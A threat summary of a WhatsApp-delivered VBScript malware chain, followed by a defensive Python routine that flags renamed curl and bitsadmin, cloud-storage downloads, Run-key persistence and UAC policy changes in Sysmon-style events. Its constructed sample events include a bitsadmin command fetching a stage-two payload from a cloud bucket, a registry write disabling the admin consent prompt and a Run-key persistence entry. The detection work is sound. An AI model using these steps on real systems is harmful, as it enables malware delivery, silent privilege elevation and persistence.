Overview
- Microsoft reports a WhatsApp-delivered Visual Basic Script attack that focuses on the Windows desktop client, though one outlet warned that WhatsApp Web users may also face risk.
- The script starts the infection by creating hidden folders and dropping renamed copies of built-in Windows tools, such as curl.exe and bitsadmin.exe, to make its actions look normal.
- Those renamed tools fetch new droppers from well-known cloud storage, including Amazon S3, Tencent Cloud, and Backblaze B2, which helps the traffic pass as legitimate.
- The malware weakens protections by altering User Account Control prompts, repeatedly launching Command Prompt with elevated rights, and adding registry keys to survive reboots.
- In the final stage it installs unsigned MSI packages, including remote-control software such as AnyDesk. Microsoft urges organizations to block script hosts, watch cloud-bound traffic, and train users to treat unexpected attachments with caution.
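The chain summarised above leaves several observable traces: a built-in tool running under a new file name from a non-system folder, a download from an object-storage host, a write to a Run key, and a change to UAC policy values. The triage routine below, an added example rather than code from Microsoft's report, checks simplified Sysmon-style process-creation and registry events for each of those traces. The sample events, paths, bucket name and registry values are constructed; the cloud hostname suffixes and the specific UAC policy value names are assumptions, since the summary does not name which hosts or values were involved.

```python
import re
from pathlib import PureWindowsPath

# Built-in tools the summary says were copied under new names. Sysmon's
# OriginalFileName field is read from the binary's version resource, so it
# survives a rename of the file on disk.
LOLBIN_ORIGINALS = {"curl.exe", "bitsadmin.exe"}

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Object-storage hostnames for the three providers named in the summary.
# The hostname suffixes are assumptions, not taken from the report.
CLOUD_HOST_RE = re.compile(
    r"(\.amazonaws\.com|\.myqcloud\.com|\.backblazeb2\.com)\b", re.I)

# Standard Windows locations: Run/RunOnce keys for persistence, and the UAC
# policy values that govern elevation prompts. The summary does not say which
# exact values the malware touched, so this list is an assumption.
RUN_KEY_RE = re.compile(
    r"\\software\\microsoft\\windows\\currentversion\\run(once)?\\", re.I)
UAC_VALUE_RE = re.compile(
    r"\\policies\\system\\(enablelua|consentpromptbehavioradmin"
    r"|promptonsecuredesktop)$", re.I)


def _image_name(event):
    return PureWindowsPath(event.get("Image", "")).name.lower()


def is_renamed_lolbin(event):
    """Embedded original name is curl/bitsadmin but the on-disk name differs."""
    orig = (event.get("OriginalFileName") or "").lower()
    return orig in LOLBIN_ORIGINALS and _image_name(event) != orig


def is_lolbin_copy_outside_system(event):
    """curl/bitsadmin executing from anywhere but the Windows system dirs."""
    orig = (event.get("OriginalFileName") or "").lower()
    image = event.get("Image", "").lower()
    return orig in LOLBIN_ORIGINALS and not image.startswith(SYSTEM_DIRS)


def fetches_from_cloud_storage(event):
    return bool(CLOUD_HOST_RE.search(event.get("CommandLine", "")))


def modifies_run_key(event):
    return bool(RUN_KEY_RE.search(event.get("TargetObject", "")))


def modifies_uac_policy(event):
    return bool(UAC_VALUE_RE.search(event.get("TargetObject", "")))


CHECKS = [
    ("renamed-lolbin", is_renamed_lolbin),
    ("lolbin-outside-system-dirs", is_lolbin_copy_outside_system),
    ("cloud-storage-fetch", fetches_from_cloud_storage),
    ("run-key-persistence", modifies_run_key),
    ("uac-policy-change", modifies_uac_policy),
]


def triage(event):
    """Return the name of every check the event trips (empty list if none)."""
    return [name for name, check in CHECKS if check(event)]


# Constructed sample events; paths, bucket name and values are made up.
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate",
     "Image": r"C:\Users\Public\.cache\svc.exe",
     "OriginalFileName": "bitsadmin.exe",
     "CommandLine": r"svc.exe /transfer job /download /priority high "
                    r"https://example-bucket.s3.amazonaws.com/stage2.bin "
                    r"C:\Users\Public\.cache\stage2.bin"},
    {"EventType": "ProcessCreate",
     "Image": r"C:\Windows\System32\curl.exe",
     "OriginalFileName": "curl.exe",
     "CommandLine": "curl.exe https://www.example.com/"},
    {"EventType": "RegistrySet",
     "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion"
                     r"\Policies\System\ConsentPromptBehaviorAdmin",
     "Details": "DWORD (0x00000000)"},
    {"EventType": "RegistrySet",
     "Image": r"C:\Windows\System32\wscript.exe",
     "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\Public\.cache\svc.exe"},
]


def triage_all(events=SAMPLE_EVENTS):
    return [triage(e) for e in events]


if __name__ == "__main__":
    for event, findings in zip(SAMPLE_EVENTS, triage_all()):
        print(event["Image"], "->", findings or "clean")
```

Each check is deliberately narrow so that a legitimate curl.exe run from System32 (the second sample) produces no finding, while the renamed bitsadmin copy in a user-writable folder trips three checks at once; correlating several of these findings on one host within a short window is a stronger signal than any single one.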